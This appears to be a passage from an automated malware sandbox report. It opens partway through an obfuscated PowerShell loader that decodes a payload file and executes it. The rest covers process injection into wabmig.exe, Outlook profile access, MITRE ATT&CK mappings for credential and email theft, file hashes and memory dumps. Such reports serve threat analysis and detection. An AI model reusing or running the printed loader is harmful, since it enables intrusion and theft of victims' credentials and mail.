icuaSyncodSutureMi enrS,ttosOrdov[D ssi$Lab rA IrrafmareksSoutheCo.trnMaa idVirree SelvlSel bs AmfeeAsexus Ns fpBulgerRom.diA fejoBamburgrkerirefrit d ele spolrOasitiO,olunAf seg Larysvagab]Exce =R ann$OpthaMFrosco SolinSubfioTr dis.ngricDurskePar,gl PaknaS eysnGrummsNskes ');$Forlagsredaktrens=Klanens 'Omniu$ embeV uftaiAd.aneSygedlSki ssPaafyefigursSymme.StrygDBorgeooutfiw SkrpnBhootlTenoroPuffea Ant d S miFnonbuiHogvelPigwee gudm( mimi$MistnT Ennor bauxo evgu Ha ntIm uniCoerce rotor Med,1 Lymp8Me hj6Funam, Acco$ KorrPSmageyBruger FlucaLakrimSlaveiStenbdqui.z) Co,p ';$Pyramid=$Forebyggendes[0];Unslyness (Klanens 'Vespe$C ntiG Ripal lexiOLatinb slavA UnaaL oint:educaGFor,roOccipTDiscoePla p=Per n(MttentCatoneDi meS OrtyT Hard-Ans.uP OutrA ,illtPakprHMiscl origi$adultpBridoy ForhrGoldeaBr,ntmSejlfiRe.redLyssi)Spani ');while (!$Gote) {Unslyness (Klanens 'Frate$PintagDowablT icao Dek,bVulgaaC trolEmpir:BusseNObligemaryswSyd vlHippoiVigoun.nevoeKomposUrobi=Glemm$ Ka et Kirkr La,tuAnlgsePerse ') ;Unslyness $Forlagsredaktrens;Unslyness (Klanens 'ro.beS DagdtTappeaOver,rMet ytXenol-CruciS s.ejl DesoeMun eeKandip Alle No,le4Arrig ');Unslyness (Klanens 'Weine$Suppog FjerlMo.aloBonavbTaarnaHyst l ecen: hel G Warso Op.ttKittee mast=M,nuf(SdvanTSaccheR lats jeset madr- Res.PB,ykoa Strat BismhFinke Tand$IsuroP Aldey inger,argiaasylamReteaiBurisd Brug)Suppr ') ;Unslyness (Klanens 'Dispe$C okegCessalU appoNonetbMa,hraSi edlSkabe:ScryeTO jekeRetrolBade.e orsopHikkelagoraaLilacyRente=Antio$MekangAr iclPresaoHinnebP otoaSemiclHoved:D,sorSCalory leuknParabtSuperaChronkCere sSmigrmInd.baPart eSkipps dekas MoreiAndesgridestIn si+bygko+Tugte%unmu $ChoriP MetorUnfuroLderbcUdkrst Unici PrestNonatiBaidasBesna.Abidac G,oboFremtu Bantn Drift Bein ') ;$Troutier186=$Proctitis[$Teleplay];}$kamillo=333348;$Hoys=29133;Unslyness (Klanens 'Lempn$Vom,tgBreedlDamplo CondbMa riaVirksl Tjre:Skakks Reg g.eglsePall,rHrbare unltGlatnnPlougi lvlanBaandgKamenewidennRhesu Hiber=Unrea Sla GTran e TidetRydde- Pol CNoct oUdfrsnEv.ditFaksieS.uscnProgrtCoemp K lku$TautoPbegroyrhumbrNonreaRegiomNonseiInfradPseud ');Unslyness (Klanens ' Trag$ owargKuverl.omeroLotanbSammeaRejusl ,riv: fklaG Proct AktieFlawepSysteaIll.mg.ecrotSca reFrekvnSoven1Argum5Adven8 E sk Laita=Obli Natu[ BantS.ogstyBeligsTugget Undee MiscmSkraa.WitzcC.loddoKlemen C pevOp,rse M.larteg,ttBans ]Ine.f:Mu.li:EducaFMisadrSupraoKa dsmSurahBPussea Lovns ueinepree 6St in4Ga dhSSalattAbranr I dbiCompunS.rivg Bort(trlas$,lodgsT mpeg SacceDestrrFrisieRespotkel inruperiudmntnB dekgkomple urflnKlap )Uria ');Unslyness (Klanens ' Mimr$CockegVerifl Ba,uo B,ndbDrivgaLiguslKopio:Bone SvoldfkFurbieAk iew ismaePhenyd Tors Desig= Ort Irreg[Tu inStrickyPantosErgomtKazooe armem Befa.La,peT Csare Oss,xSalintepide.c ntaE ultin SkidcO tanoT bskd beriiHypoin JerngDropf].ense:praeg:L jevAIrrecSFise CSfor IDrnenIdr.km.ThorhG avvreRailrtFreskSberett DyderRegeliErsrenVouchgPreou( Picn$Patt GSpe mtPar meGer gpR.stia tersgarrest Chece Begrn ,adi1Micro5Skage8Qu me)Blide ');Unslyness (Klanens 'Pro y$Rem dgGaelilAflytoCheezbRetsmaTrolilKredi:MaalrKKillilroastoth,argObtuntTil,s=Skraa$OverpSHelvekNuance,uffewVengieNomosdOvers.NedslsCif.euKrakibevig s Inc.tV rlirForskiDeletnNedklgCha.q(Carla$Tele kSubnuaChampmCourtiDiktalNedl lMaskeom rra,zardm$ CentH ForvoSquawyNe,tesMbler)Sp cu ');Unslyness $Klogt;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trkisternes.Brk && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2380
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:1944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3063565911-2056067323-3330884624-1000\0f5007522459c86e95ffcc62f32308f1_de87a6d6-9d44-4942-9ec6-2be31b435411

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UOQ9QA4O01U3VI2YVNCO.temp

Filesize
7KB

MD5
0cd3422abc6f7307f1cf927d9cfb075b

SHA1
a15c91aa8243074ec8b7ca284d7546efa507e9b3

SHA256
67697de77635fca5be42070ec367bbe47894f8d8b457e60e8d84b7a1e03fc24b

SHA512
1e69debce4ae14b9fb9d5815947be612d0634345688916807a75be664e23c4725ab313e8d4498702f1c3061810b535ab03992d902e7bbeee5aa2d05b0e28d1b6

Download Submit
C:\Users\Admin\AppData\Roaming\Trkisternes.Brk

Filesize
471KB

MD5
27ee351b991f2fba2750c9b1a2836ac9

SHA1
cb562a39b754eee37113b546fee24bf6ea02b3fb

SHA256
89a1b6bbfb720a61871e8131a91926dee8f03b89ee0432079bba965433521fdb

SHA512
882eb7a44f25bb1895d23774e768c8570d04528102e49a824f43731e1cf5e529762434ce89ee837363e7a0c77601ce03b210860ac5c4aed1329b9f2816aa5b2f

Download Submit
memory/1944-42-0x00000000007C0000-0x0000000002F76000-memory.dmp

Filesize
39.7MB

Download
memory/1944-21-0x00000000007C0000-0x0000000002F76000-memory.dmp

Filesize
39.7MB

Download
memory/2480-8-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-11-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-12-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

Filesize
4KB

Download
memory/2480-13-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-15-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-9-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-10-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-4-0x000007FEF578E000-0x000007FEF578F000-memory.dmp

Filesize
4KB

Download
memory/2480-5-0x000000001B590000-0x000000001B872000-memory.dmp

Filesize
2.9MB

Download
memory/2480-43-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2480-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

Filesize
32KB

Download
memory/2480-7-0x000007FEF54D0000-0x000007FEF5E6D000-memory.dmp

Filesize
9.6MB

Download
memory/2644-20-0x0000000006760000-0x0000000008F16000-memory.dmp

Filesize
39.7MB

Download

Analysis

Sharing